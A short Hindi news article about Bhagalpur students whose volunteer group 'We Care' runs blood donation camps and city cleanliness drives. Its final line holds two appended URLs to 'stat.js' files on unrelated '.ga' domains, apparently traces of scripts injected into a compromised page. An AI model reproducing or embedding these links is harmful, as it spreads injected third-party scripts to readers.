दुनिया में आज भी इंसानियत खत्म नहीं हुई इस बात की मिसाल बन रहे है भागलपुर के कुछ युवक। यह युवक विद्यार्थी होने के बावजूद भी अपने पॉकेट खर्च से समाज की सेवा कर रहे हैं। जिस संस्था के अंतर्गत यह युवक कार्य कर रहे हैं उसका नाम वी केयर है।
दरअसल, संगठन के संस्थापक सदस्य कुश चौबे ने 24 जून 2018 को वी केयर संसद का गठन किया था जिसके बाद उन्होंने जवाहरलाल नेहरू चिकित्सा महाविद्यालय अस्पताल में ब्लड डोनेशन कैंप लगाया और करीब 54 यूनिट ब्लड दान किया। जिस व्यक्ति संस्था की शुरुआत की गई थी तब इसमें मात्र 6 से 8 छात्र ही जुड़े थे लेकिन अब इस संस्था से करीब 45 से 50 सक्रिय सदस्य जुड़ गए हैं। इस संस्था का एकमात्र लक्ष्य समाज की सेवा करना है।
ब्लड डोनेशन के साथ साथी युवा 2019 के दिसंबर से शहर में सफाई अभियान में भी जुड़ गए हैं। नितेश चौबे ने जानकारी दी कि जहां भी सफाई अभियान चलाते हैं वहां के स्थानीय लोग जुड़ का साथ देते हैं और अपने आसपास के क्षेत्र साफ सुथरा रखने की शपथ लेते हैं।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms